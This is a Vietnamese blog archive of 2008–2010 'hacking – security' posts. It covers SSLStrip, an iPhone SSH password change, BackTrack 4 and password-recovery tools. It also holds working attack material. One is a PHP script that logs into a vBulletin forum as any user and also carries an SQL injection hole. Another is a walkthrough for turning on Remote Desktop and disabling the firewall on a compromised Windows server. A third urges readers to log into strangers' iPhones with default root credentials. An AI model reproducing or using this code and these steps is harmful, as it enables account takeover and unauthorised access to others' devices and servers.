Archive

Archive for the ‘HACKING – SECURITY’ Category

Lỗi mã hóa SSL đe dọa dữ liệu cần bảo mật

March 11, 2010 Leave a comment

Cơ sở dữ liệu mang thông tin nhạy cảm như chi tiết thẻ tín dụng, thông tin tài khoản ngân hàng kèm mật khẩu đều có thể bị tấn công qua lỗi trong phần mềm sử dụng mã hóa bảo mật SSL.

Vấn đề nằm trong cách thức mà nhiều trình duyệt sử dụng để triển khai SSL (Secure Sockets Layer) và lỗi cũng nằm trong hệ thống khóa công cộng X.509 thường được dùng để quản lý chứng thực số được sử dụng bởi SSL nhằm quyết định xem website đó có đáng tin cậy hay không.

Moxie Marlinspike, chuyên gia nghiên cứu bảo mật, đã trình diễn cách thức chặn luồng lưu lượng SSL bằng chứng thực kết thúc rỗng (null-termination certificate – theo cách gọi của Marlinspike). Để thực hiện công việc tấn công, Marlinspike buộc phải cài đặt phần mềm “SSL Strip” của mình lên mạng nội bộ trước. Sau khi cài đặt, nó chặn các lưu lượng kết nối SSL và bắt đầu thực hiện “chứng thực kết thúc rỗng” để ngắt liên lạc giữa máy chủ và máy trạm.

Giải mã “SSL Strip” – Kiểu tấn công người-đứng-giữa

codeSSL

(Ảnh minh họa: DefCon 07)

Việc khai thác giao diện giữa các session http và https sử dụng những kỹ thuật đã có từ vài năm nay. SSL Strip thực hiện tấn công một lưu lượng http (không bảo mật) thông thường, thay thế những liên kết đến các trang https bảo mật bằng http. Người dùng sẽ đăng nhập tài khoản và thông tin thẻ tín dụng trên một trang không bảo mật và tin tặc sử dụng SSL Strip có thể thu thập thông tin chi tiết này dễ dàng.

Điểm nguy hại của kiểu tấn công người-đứng-giữa (man-in-the-middle attack) này là người dùng vẫn tin tưởng rằng mình đang sử dụng liên kết được bảo mật (https).

Khi một người dùng cẩn thận truy cập vào 1 trang web với kết nối mã hóa bảo mật (biểu tượng ổ khóa trên thanh địa chỉ và kết nối https thay vì http) ví dụ như đăng nhập vào tài khoản Gmail, bạn sẽ được chuyển đến địa chỉ đăng nhập bảo mật https của google.com và kể từ lúc đó, hầu hết người dùng đều không để ý đến kết nối https nữa vì đinh ninh rằng mình vẫn tiếp tục kết nối bảo mật với dữ liệu được mã hóa.

Thông tin xung quanh lỗi trong phần mềm mã hóa SSL và SSL Strip của Moxie Marlinspike có thể tham khảo thêm tại hội thảo Black Hat USA 2009 (ngày 25 đến 29-7-2009) và hội thảo DEFCON 17 (đang diễn ra).

SSL Strip đánh vào tâm lý chủ quan đó của đại đa số người dùng bằng cách thực hiện vài thao tác giả mạo. Một ví dụ nhỏ về bẫy đơn giản là thay thế biểu tượng Favicon bằng một biểu tượng ổ khóa tương tự với biểu tượng ổ khóa của kết nối https. Mặc dù nó nằm sai vị trí và kết nối vẫn thuộc dạng thông thường http nhưng đa số người dùng sẽ không để ý và mắc bẫy.

codeSSL1

Kết nối bảo mật https (SSL) sẽ giúp đảm bảo an toàn thông tin cho người dùng khi giao dịch trực tuyến

Marlinspike cho biết đã “lấy tạm” 117 tài khoản email, 16 thẻ tín dụng, 7 tài khoản Paypal… để làm minh chứng cho khả năng của “SSL Strip”.

Tạo chứng thực giả

Marlinspike còn triển khai cách thức tin tặc có thể sử dụng lỗi trong IDN (International Domain Name) để lấy một chứng thực SSL để bẫy ngược lại bộ chỉ điểm của SSL thông thường và hiển thị tên miền với https.

Kiểu tấn công này không phải là một cuộc tấn công vào SSL thực sự mà chỉ “đánh vòng” vào sườn xung quanh SSL. Không có mã hóa nào bị phá vỡ.

Marlinspike tạo ra chứng thực giả cho tên miền (domain) của mình có kèm theo ký tự rỗng (null) thường được hiển thị là . Một số chương trình sẽ bị mắc lừa bởi chứng thực giả, ngưng đọc nội dung khi chúng bắt gặp 1 ký tự rỗng. Do đó, một chứng thực giả cho www.paypal.com.tenmien.com lại được chương trình hiểu là thuộc về paypal.com.

codeSSL2

Moxie Marlinspike tại hội thảo bảo mật Black Hat 2009

Mức độ nguy hiểm cao

MD2 là thuật toán được sử dụng bởi hãng bảo mật VeriSign từ 13 năm trước, có mặt trên mọi trình duyệt web. VeriSign đã ngưng sử dụng MD2 vào ngày 17-5-2009 vì không còn bảo đảm an toàn trước những cuộc tấn công từ tin tặc.

Xem video phỏng vấn Moxie Marlinspike tại đây.

“Cách tấn công này chưa thể dò tìm ra và cho phép tin tặc đánh cắp mật khẩu, hijack vào các phiên giao dịch ngân hàng trực tuyến hay thậm chí là đưa ra một bản cập nhật trình duyệt FireFox có đính kèm mã độc”, Marlinspike cho biết. “Việc tạo chứng thực giả cũng ảnh hưởng rộng rãi lên nhiều chương trình như Internet Explorer hay FireFox 3, phần mềm VPN (mạng riêng ảo), các chương trình email-client hay tin nhắn tức thời (IM)..”.

Các chuyên gia đều cho biết tin tặc cao tay có thể dễ dàng vượt chứng thực bảo mật SSL vì công nghệ mã hóa MD2 vẫn còn được dùng trong nhiều chương trình web đã quá lỗi thời và không còn bảo mật. Hiện chỉ có trình duyệt FireFox 3.5 đã khắc phục lỗi “kết thúc rỗng”.

Hầu hết đồng ý cho rằng hệ thống X.509 thường được dùng để quản lý chứng thực cho SSL đã quá cũ kỹ, cần được sửa chữa và nâng cấp.

Theo Thanh Trực

———-

LAB Demo : Using SSLStrip to proxy an SSL connection and sniff it

Categories: HACKING - SECURITY

TIP: Change your iPhone’s SSH password

August 13, 2009 1 comment

Là dân IT, chắc hẳn bạn đã Jailbreak (*) con IPhone của bạn để vọc hết tính năng của nó, bạn có thể dùng nhiều bộ cài đặt nhưng thông thường nhất là sử dụng bộ cài đặt Cydia/Installer.

cydia

Để tiến sâu vào trong lòng IPhone hơn thì bạn phải cài gói OpenSSH để vào Iphone qua con đường đó, tuy nhiên nhược điểm ở đây là tất cả đều chung username : root và password : alpine. Và SSH luôn luôn mở khi bạn restart Iphone.

Như vậy là khi bạn kết nối internet với các thông tin mà attacker đã biết hết thì việc vào phone của bạn là một điều hết sức dễ dàng. Để tránh bị “héc kờ” dòm ngó vào các thông tin cá nhân của mình thì cách đơn giản nhất là tắt SSH hoặc đổi password user root. Cách làm của tôi là đổi password User root.

– Tôi đã cho Iphone kết nối internet qua wifi và IPhone nhận được IP là 192.168.1.67

– Trên computer, tôi ping tới địa chỉ  192.168.1.67 thành công.

picture180

– Tôi dùng phần mềm putty để kết nối với Iphone qua đường SSH.

picture181

– Chọn YES để nhận RSA KEY

picture189

– Nhập username/password mặc định của Cydia là : root/alpine

picture190

– Gõ lệnh “passwd” và nhập vào password mới. Như vậy là OK rồi, hihi smile_regular

picture192 

P/s : Ra quán cafe mà thấy ai dùng Iphone thì hãy kết nối SSH vào với username và pass là root/alpine thì cơ hội thành công cao lắm đó nha, chính tôi đã thử rồi. hehe smile_embaressed

(*) JAILBREAK là gì? : JAIL Break là bước đầu tiên trong quá trình hacking iphone.Khi mà iphone ở trong tình trạng nguyên bản từ nhà máy ra thì các file hệ thống của nó được bảo vệ rât tốt. Để đơn giản hơn, hãy tưởng tượng iphone là một cái xe ô tô . Apple muốn bạn ngồi sau xe, và đây là nơi mà bạn thưởng thức nhạc, video, wallpaper hay là photos. Apple hài lòng khi để bạn ngồi ghế sau của xe, đưa bạn chạy lòng vòng trên con đường mang tên AT&T. Nhưng bây giờ bạn muốn lái xe thì sao?
Những con iphone của chúng ta được ví giống như xe thùng của cảnh sát. Ngăn cách giữa ghế sau và ghế trước là một cánh cửa thép to lớn và nặng trịch. Làm thế nào để vượt qua được cánh cửa này? Lúc này là lúc chúng ta cần đến JAILBREAK. JAILBREAK là một quá trình đưa bạn ra khỏi hàng ghế sau, lên ghế trước nơi mà bạn có thể cầm vô lăng, đạp pedal, điều khiển radio, còi xe..vv. Khi iphone đã JAILBREAK, bạn có toàn quyền điều khiển con dế của mình, bạn có thể chạy bất cứ chương trình gì trên iphone giống như bạn có toàn điều khiển chiếc xe của chính mình.

Categories: HACKING - SECURITY

CodeGate 2009

March 9, 2009 2 comments

CodeGate 2009 là cuộc thi hacking có giải thưởng lên đến $35.000 smile_tongue Kết quả sau 3 ngày thì các bạn Việt Nam của ta xếp hạng 9 smile_nerd

http://hacking.beist.org

picture083

Categories: HACKING - SECURITY

Fake login vBulletin

February 27, 2009 2 comments

Ta có thể login vào forum vbb với 1 nick bất kỳ bằng cách sau :

– Save đoạn code dưới dưới dạng file xxx.php, upload lên hosting.

– Chạy đường dẫn http://domain.com/forum/xxx.php?bd=username

Bùm … truy cập lại link http://domain.com/forum/index.php đã đăng nhập với nick username smile_regular

CODE :

<?php
if (isset($_GET[‘bd’]))
{
define(‘THIS_SCRIPT’, ‘login’);
require_once(‘./global.php’);
require_once(‘./includes/functions_login.php’);
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = ‘" . $_GET[‘bd’] . "’");
if (!$vbulletin->userinfo[‘userid’]) die("Invalid username!");
else
{
vbsetcookie(‘userid’, $vbulletin->userinfo[‘userid’], true, true, true);
vbsetcookie(‘password’, md5($vbulletin->userinfo[‘password’] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET[‘bd’]);
process_new_login(‘cplogin’, TRUE, TRUE);
do_login_redirect();
}
}

?>

DEMO :

picture078

picture077

Categories: HACKING - SECURITY

BackTrack4 Beta release

February 12, 2009 1 comment

Download : http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso

bt4_1

bt4_2

bt4_3

Một số thông tin:

* Default password to BackTrack 4 hasn’t changed, still root / toor.
* KDE 3 is being used in BT4. We tried KDE 4, really, we did. It ****ed. Maybe 4.2 in BT4 final.
* Most of the KDE "apt gettable" packages have "kde3" appended to their names. So "apt-get install kate-kde3" is good, "apt-get install kate" is bad. Use "apt-cache search " to search for packages to install.
* Kernel sources included in /usr/src/linux.
* DHCP disabled by default on boot, you need to /etc/init.d/networking start
* If you do an HD install and want to restore networking (DHCP) to be enabled at boot, type "update-rc.d networking defaults".
* VMware users – to fix the KDE resolution, type "fixvmware" before starting X.
* Vmware tools and kernel modules compile perfectly on VMWare 6.5.1
* If you can’t get X to work, first try to autogenerate an xorg.conf by typing "Xorg -configure" and try using the generated conf file. If that bums out, you can revert to VESA by typing "fixvesa".
* Wireless networking in KDE can be started with KnetworkManager (/etc/init.d/NetworkManager)
* Various drivers can be found in /opt/drivers (various madwifi branches, video drivers for Nvidia and HP 2133’s).
* Installation of BT4 to HD is similar to BT3. (tip – dont forget to modify /etc/fstab after the install. Change the first line from aufs / aufs …. to the corresponding device and filesystem. For example, on my box it’s /dev/sda3 / reiserfs defaults 0 0, as my root partition is on sda3 and i used the resiserfs filesystem).
* The warning message "W: GPG error: http://ppa.launchpad.net intrepid Release: The following signatures couldn’t be verified because the public key is not available: NO_PUBKEY CB2F6C86F77B1CA9" when "apt-get update" occurs as the Intrepid KDE 3 repos do not use a GPG key. We will eventually host these package in our own repo.
* Conky takes a while to load.

Categories: HACKING - SECURITY

BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA

November 19, 2008 5 comments

Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.

Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3

B1. Trên Server kiểm tra remote desktop chưa bật.

picture001

B2. Trên máy Attacker, telnet vào Server

picture002

B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop

picture003

Nội dung file VBScript remote.vbs

machine = "."
cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ‘ 0=off, 1=on

set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next

B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.

picture004

B5. Dùng lệnh dir kiểm tra

picture005

B6. Chạy file remote.vbs để bật remote desktop.

picture006

B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)

picture007

B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật

picture008

B9. Tắt firewall của Server

Sử dụng lệnh : Netsh firewall set opmode disable

picture009

B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.

Sử dụng lệnh rdesktop [hostname]

picture010

B11. Nhập username/password của Administrator

picture011

B12. Truy cập thành công với quyền Administrators

picture012

Have a nice day smile_wink

Categories: HACKING - SECURITY

Một số công cụ xem Password

October 29, 2008 Leave a comment

Vận dụng tính năng lưu lại các password của các phần mềm, các công cụ sau sẽ giúp ta lấy lại các mật khẩu này:

password_star

IE Passview
– Hỗ trợ IE7
– Recovery password lưu trữ trên IE gồm: AutoComplete, HTTP Authentication, FTP
Download

Mail PassView
Xem và Export Password account Outlook Express, MS Outlook, Windows Mail,…
Download

PstPassword
Password Outlook .PST file
Download

WirelessKeyView
Download

Dialupass
Xem password Dialup/RAS/VPN
Download

Revelation
Công cụ hiển thị các password trực tiếp trên các textbox (dấu *)
Download

Categories: HACKING - SECURITY